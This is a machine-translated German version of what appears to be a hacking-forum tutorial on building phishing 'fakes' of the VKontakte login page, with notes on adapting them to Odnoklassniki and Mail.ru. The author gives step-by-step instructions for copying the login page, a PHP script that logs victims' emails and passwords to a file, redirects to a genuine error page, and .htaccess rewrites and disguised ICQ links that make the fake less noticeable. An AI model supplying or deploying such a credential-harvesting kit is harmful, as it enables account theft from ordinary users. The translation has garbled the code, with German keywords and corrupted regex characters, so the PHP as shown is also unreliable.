This page has been robot translated, sorry for typos if any. Original content here.

Peitsche falsch

[iNtrO]

Es gab nichts zu tun, es war am Abend ... Tatsächlich wurde ich bei meinem ersten Artikel (dem ersten über Antiquitäten) darauf hingewiesen, dass es im Abschnitt " Kaufen / Verkaufen / Tauschen / Werfen " ein Thema gibt, bei dem ein Hacker so viele Fälschungen verkauft hat 10 vmz und oft gebeten, die eine oder andere Fälschung zu erstellen ...
Ich werde Ihnen in einem Artikel sagen, wie Sie eine universelle Fälschung fast für alles ficken können, was ein Wagen ist! Ich werde Ihnen ein Beispiel für eine VKontakte-Fälschung zeigen.

[SeaRchINg]

Wir müssen also eine Opferressource auswählen und alle benötigten Informationen sammeln. Wir benötigen nur eine Kopie einiger Seiten. Wir gehen über Operu (!) Zu vkontakte.ru . Wir klicken auf die Eingabeschaltfläche, gelangen zu login.pxp und nehmen sie als Index für unsere Fälschung. Klicken Sie in die Oper: Datei -> Speichern unter -> Wählen Sie im daraufhin angezeigten Dialogfeld unter dem Namen (standardmäßig das Webarchiv ....) " HTML- Datei mit Bildern " aus und schreiben Sie optional den Spaltenindex Dateiname (oder login.htm) - je nach Seite)


Als nächstes geben wir dort unrealistische Daten ein und gelangen zu der Seite, auf der sie geschrieben sind
Diese E-Mail-Adresse ist nicht registriert oder das Passwort ist falsch.
Wir speichern es auf die gleiche Weise, nur schreiben wir anstelle des Index schlecht .
Als nächstes fahren wir die Phrase Vkontakte.ru in Google.ru, klicken auf Zusätzliche Ergebnisse von vkontakte.ru und suchen nach etwas, das mit dem Kontakt Eros zusammenhängt ... Auf der zweiten Seite fand ich VKontakte | Fehler (http://vkontakte.ru/blank.php?code=10)- Denken Sie daran, wir brauchen diesen Link
Schnurrbart, wir haben bereits alles, was wir für eine Fälschung aus einer Ressource benötigen.

[CoDiNg]

Dackel, jetzt untersuchen wir das Anmeldeformular. Öffnen Sie unsere index.html und suchen Sie nach dem Anmeldeformular.
 <form method = "post" name = "login" id = "login" action = "login.php">

  <input type = "hidden" name = "success_url" id = "success_url" value = "">
  <input type = "hidden" name = "fail_url" id = "fail_url" value = "">

  <input type = "hidden" name = "try_to_login" id = "try_to_login" value = "1">
  <table align = "center" cellpadding = 0 cellspacing = 7 border = 0 width = "40%">

  <tr>
  <td width = "100px">
  <span class = "grey"> E-Mail: </ span>
  </ td>
  <td>

  <input class = "inputText" type = "text" name = "email" value = "" id = "email" size = "25" />

  <td>
  </ tr>
  <tr>
  <td>
  <span class = "grey"> Passwort: </ span>

  </ td>
  <td>
  <input class = "inputText" type = "password" name = "pass" value = "" id = "pass" size = "25" />

  </ td>
  </ tr>
 
  <tr>
  <td>
  & nbsp;
  </ td>
  <td>

  <input style = "Rand oben: 1 Pixel; vertikal ausrichten: Mitte;"  type = "checkbox" name = "expire" id = "expire" value = "1" /> <small> Ein anderer Computer </ small>

  </ td>
  </ tr>
  <tr>
  <td>
  & nbsp;
  </ td>
  <td>
Von hier aus erinnern wir uns an 3 Dinge:
<form method = "post" name = "login" id = "login" action = "login.php">
<input class = "inputText" type = "text" name = "email" value = "" id = "email" size = "25" />
<input class = "inputText" type = "password" name = " pass " value = "" id = "pass" size = "25" />
In diesen drei Dingen liegt der erste Teil der Einzigartigkeit in jedem sozialen Netzwerk, jeder E-Mail oder irgendwo anders, überall dort, wo das Eingabeformular (Felder) in dieser Form vorliegt (nun, nur der Name der Felder wird unterschiedlich), zum Beispiel für Klassenkameraden
<input id = "field_password" value = "" style = "width: 170px;" type = "password" size = "20" name = " st.password ">
Das heißt, der Name der Felder unterscheidet sich einfach durch Designelemente, aber die Funktion ist für alle gleich.
Jetzt erstellen wir eine PHP-Datei und nennen sie zum Beispiel login.php , deren Inhalt:

PHP-Code:
  <? php
 

/ *
###############
# by_NoNameZ #
#############
* /
$ f = fopen ( "log.txt" , "at" );
Herde ( $ f , 2 );
if ( preg_match ( "/^([.0-9a-z_-†+) @ (( [0-9a-z- † + \.) + ►0-9a-z {{, 4,4►) $ / i " , $ _POST [ 'email' ]) &&! leer ( $ _POST [ 'password' ])) {
fputs ( $ f , $ _POST [ 'email' ]. ";" . $ _POST [ 'password' ]. "\ n" );
Header ( "Ort: http: //" );
} else {
Header ( "Ort: http: //" );
}}
Herde ( $ f , 3 );
fclose ( $ f );
?>
Eigentlich schauen wir uns das Skript an, ein paar Striche, aber das ist eine ganz normale Fälschung, seine Funktionalität:
Speichern der übertragenen Variablen, Überprüfen, Umleiten je nach Prüfung.

Und jetzt zurück zu diesen drei Zeilen:
<form method = "post" name = "login" id = "login" action = " login.php ">
Hier ist alles in Ordnung, der Name unseres Skripts stimmt mit dem Namen überein, aber er stimmt nicht überein. Dann ersetzen wir ihn oder benennen unseren um.
<input class = "inputText" type = "text" name = "email" value = "" id = "email" size = "25" />
<input class = "inputText" type = "password" name = "pass" value = "" id = "pass" size = "25" />
Von hier aus brauchen wir name = " email " und name = " pass "
Fügen Sie sie an der richtigen Stelle in unser Skript ein
  <? php
 

/ *
###############
# by_NoNameZ #
#############
* /
$ f = fopen ( "log.txt" , "at" );
Herde ( $ f , 2 );
if ( preg_match ( "/^([.0-9a-z_-†+) @ (( [0-9a-z- † + \.) + ►0-9a-z {{, 4,4►) $ / i " , $ _POST [ 'email' ]) &&! leer ( $ _POST [ 'pass' ])) {
fputs ( $ f , $ _POST [ 'email' ]. ";" . $ _POST [ 'pass' ]. "\ n" );
Header ( "Ort: http: //" );
} else {
Header ( "Ort: http: //" );
}}
Herde ( $ f , 3 );
fclose ( $ f );
?>
Wer es nicht bemerkt hat, es ist $ _POST ['email'] und $ _POST ['pass']

Als nächstes schauen wir uns das Knarren an, hier ist die IF ELSE-Funktion installiert und das Pregmatch, dh wenn das E-Mail-Feld der E-Mail (nickname@mylo.ru und nicht wie gesagt yvpmdvgk) entspricht und das Passwortfeld nicht leer ist, wird die erste Weiterleitung ausgeführt, wenn die E-Mail nicht übereinstimmt oder Das Passfeld ist leer und wechselt dann zur zweiten Umleitung. Daraus folgt, dass wenn die Schale Seife und etwas Ähnliches wie ein Pass einführte, wir sie mit eror http://vkontakte.ru/blank.php?code=10 auf die Seite werfen und wenn Sie Müll eingegeben haben (hier brauchten wir Kopie der bad.html-Seite (wenn wir die falschen Daten eingegeben haben), dann werfen wir sie zurück, dh geben Sie bad.htm ein.

PHP-Code:
  <? php
 

/ *
###############
# by_NoNameZ #
#############
* /
$ f = fopen ( "log.txt" , "at" );
Herde ( $ f , 2 );
if ( preg_match ( "/^([.0-9a-z_-†+) @ (( [0-9a-z- † + \.) + ►0-9a-z {{, 4,4►) $ / i " , $ _POST [ 'email' ]) &&! leer ( $ _POST [ 'pass' ])) {
fputs ( $ f , $ _POST [ 'email' ]. ";" . $ _POST [ 'pass' ]. "\ n" );
Header ( "Speicherort: http://vkontakte.ru/blank.php?code=10" );
} else {
Header ( "Ort: bad.htm" );
}}
Herde ( $ f , 3 );
fclose ( $ f );
?>
Speichern.Füllen Sie den ganzen Mist auf dem Server (login.php, index.htm + Ordner mit Dateien, bad.htm + Ordner mit Dateien), erstellen Sie eine log.txt- Datei (ich rate Ihnen, Ihren eigenen eindeutigen Namen zu finden. Vergessen Sie nicht, ihn im Skript zu ändern), setzen Sie ihn auf ihn chmod777.

3) ein kleines Update ...

Dieses Update ist sehr gut für SI geeignet. Im Stammverzeichnis von ftp erstellen wir eine .htaccess- Datei mit folgendem Inhalt:

Rewriteengine on
RewriteCond% {REQUEST_FILENAME}! -F
RewriteCond% {REQUEST_URI}! Index \ .htm
RewriteRule (. *) Index.htm? [QSA]

ACHTUNG !!!
! index \ .htm - Leiten Sie zu dieser Datei um, wenn Sie eine gefälschte login.html-Anmeldung haben. dann müssen Sie den Index entsprechend umbenennen, um sich anzumelden.

Dackel, diese Datei gibt uns einen Link qualitativ hochwertiger, nämlich:
yourfeyk.ru / jeder Text, wenn Sie die Linkstruktur der erwarteten Fälschung kennen, zum Beispiel einen Kontakt, können wir dies tun:


yourfake.ru / photos.php? act = show & id = 15884695_588954334 & uid = 359648756 & self = 6
und vparit es auf ICQ))) zustimmen. weniger auffällig jetzt falsch))

Das ist alles

[DAS ENDE] Eigentlich ist das einzigartig, aber die Tatsache, dass Sie zu Klassenkameraden gehen, die Seite speichern, Variablen eingeben, URLs ersetzen können (ich gebe sofort http://odnoklassniki.ru/dk?st.cmd=error) und das ist alles, absolut das Gleiche Gehen Sie zu Mayil.ru, speichern Sie die Variablen und ersetzen Sie sie.))) Das einzige, was Sie möglicherweise benötigen, ist Kreativität. Speichern Sie nicht die Hauptseite, sondern die Anmeldeseite. Sie können auch ein beliebiges Forum erstellen, wenn Sie sagen, dass Sie eine acc erhalten möchten ( Senden Sie in pm
<a href="fake"> Themenlink </a>
, und in der Fälschung geben Sie dieses Thema für eine Weiterleitung an.